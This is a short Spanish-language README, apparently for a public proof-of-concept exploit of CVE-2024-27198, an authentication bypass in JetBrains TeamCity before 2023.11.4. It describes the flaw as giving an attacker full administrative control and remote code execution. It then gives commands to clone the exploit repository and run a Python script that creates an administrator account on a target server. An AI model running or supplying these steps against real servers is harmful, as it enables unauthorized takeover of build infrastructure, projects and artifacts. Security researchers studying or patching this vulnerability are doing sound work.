
PoC sobre CVE-2024-27198
En JetBrains TeamCity anterior a la versión 2023.11.4, se presenta una omisión de autenticación que permite realizar acciones de administrador en el servidor TeamCity. Un atacante puede tomar el control total de todos los proyectos, builds, agentes y artefactos de TeamCity, finalmente el atacante ejecutará un RCE.
git clone https://github.com/jrbH4CK/CVE-2024-27198.git
cd CVE-2024-27198
Para crear una cuenta con privilegios de administrador dentro del servidor
python3 cve-2024-27198.py http://example.com username password

